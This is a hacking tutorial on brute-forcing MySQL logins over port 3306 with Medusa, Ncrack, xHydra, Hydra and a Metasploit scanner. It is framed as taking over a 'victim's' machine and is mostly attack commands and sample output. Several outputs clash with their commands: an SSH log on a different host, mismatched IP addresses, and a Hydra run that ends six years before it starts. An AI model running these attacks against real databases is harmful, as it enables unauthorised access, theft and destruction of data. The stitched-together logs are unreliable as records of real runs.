5 Ways to Hack MySQL Login Password

In this article, we will learn how to gain control over our victim’s PC through MySQL service via port 3306. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

 medusa  -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql 

Here

-U: denotes path for username list
-P:  denotes path for password list

As you can observe that we had successfully grabbed the mysql username as root and password as toor.

# medusa  -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql  
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks  

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) 
Password: 123456 (1 of 500 complete) 
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) 
Password: password (2 of 500 complete) 

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) 
Password: billy (498 of 500 complete) 
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) 
Password: toor (499 of 500 complete) 
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

 ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306 

Here

-U: denotes path for username list
-P:  denotes path for password list

As you can observe that we had successfully grabbed the mysql username as root and password as toor.

root@kali:~# ncrack -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 -p 3306

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-01 09:54 EDT

Discovered credentials for mysql on 192.168.1.200:3306/tcp:
Ncrack done : 1 service scanned in 45.02 seconds.

Ncrack finished. 

xHydra

This is the graphical version to apply dictionary attack via 3306 port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select MYSQL in box against Protocol option and give the port number 3306 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 mysql 

-L: denotes path for username list
-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the mysql username as root and password as toor.

root@kali:~# hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 mysql 
Hydra v8.6 (c) 2017 by van Hauser/THC & David Maciejak - for legal purposes only 

Hydra (http://www.thc.org/thc-hydra) starting at 2019-05-13 04:32:18
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) 
[DATA] attacking service mysql on port 3306 
[VERBOSE] Resolving addresses ... done 
[ATTEMPT] target 192.168.1.106 - login "root" - pass "123456" - 1 of 3546 [child 0] 
[ATTEMPT] target 192.168.1.106 - login "root" - pass "12345" - 2 of 3546 [child 0] 
[ATTEMPT] target 192.168.1.106 - login "root" - pass "password" - 3 of 3546 [child 0] 

[3306][mysql] host: 192.168.1.106   login: root   password: toor 
[STATUS] attack finished for 192.168.1.106 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found 

Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33 
root@kali:~# 

Metasploit

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.106
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > set stop_on_success true
msf auxiliary(mysql_login) > run 
[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a 
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username:'root' with password:'toor' 
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : 'toor' 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file. Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.